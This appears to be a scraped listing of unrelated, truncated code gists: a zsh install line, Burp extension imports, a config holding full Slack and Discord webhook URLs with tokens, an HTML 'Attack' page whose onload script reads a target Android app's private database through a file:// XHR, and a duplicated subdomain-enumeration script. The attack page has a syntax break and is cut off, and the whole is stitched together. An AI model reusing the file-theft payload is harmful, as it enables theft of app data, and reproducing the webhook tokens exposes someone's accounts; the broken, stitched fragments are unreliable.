sudo apt install zsh-autosuggestions zsh-syntax-highlighting zsh
import json | |
import sys | |
from java.io import PrintWriter | |
from burp import IBurpExtender | |
from burp import IHttpRequestResponse | |
from burp import IHttpService | |
from burp import ISessionHandlingAction | |
import re | |
#Regex for extracting value of the token from the HTML Body |
I hereby claim:
To claim this, I am signing this object:
burp_biid: "123456798" | |
slack_webhook_url: https://hooks.slack.com/services/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 | |
slack_username: prob | |
slack_channel: alert | |
slack: true | |
discord_webhook_url: https://discord.com/api/webhooks/763657778480414721/lZyZIbTFP9ZtL_0nPrUS9fGtsf-D4xPgCv_ESp4Olv4jMrCjv3YS608WIPJHxh-sxc8F | |
discord_username: fucker |
<html> | |
<body onload="doAttack()"> | |
<h1>Attack</h1> | |
<script> | |
// file path to steal | |
var target "file:///data/data/com.target.app/databases/target.db"; | |
= | |
// get the contents of the target file by XHR | |
function doAttack() { | |
var xhr1 = new XMLHttpRequest(); |
This goes with the Traversy Media Scrapy tutorial on YouTube
pip install scrapy
#! /bin/bash | |
findomain -t $1 -q | tee $1.txt | |
subfinder -d $1 -silent | tee -a $1.txt | |
#crtsh | |
crtsh(){ | |
curl -s https://crt.sh/?q\=%.$1\&output\=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | |
} |
#! /bin/bash | |
findomain -t $1 -q | tee $1.txt | |
subfinder -d $1 -silent | tee -a $1.txt | |
#crtsh | |
crtsh(){ | |
curl -s https://crt.sh/?q\=%.$1\&output\=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | |
} |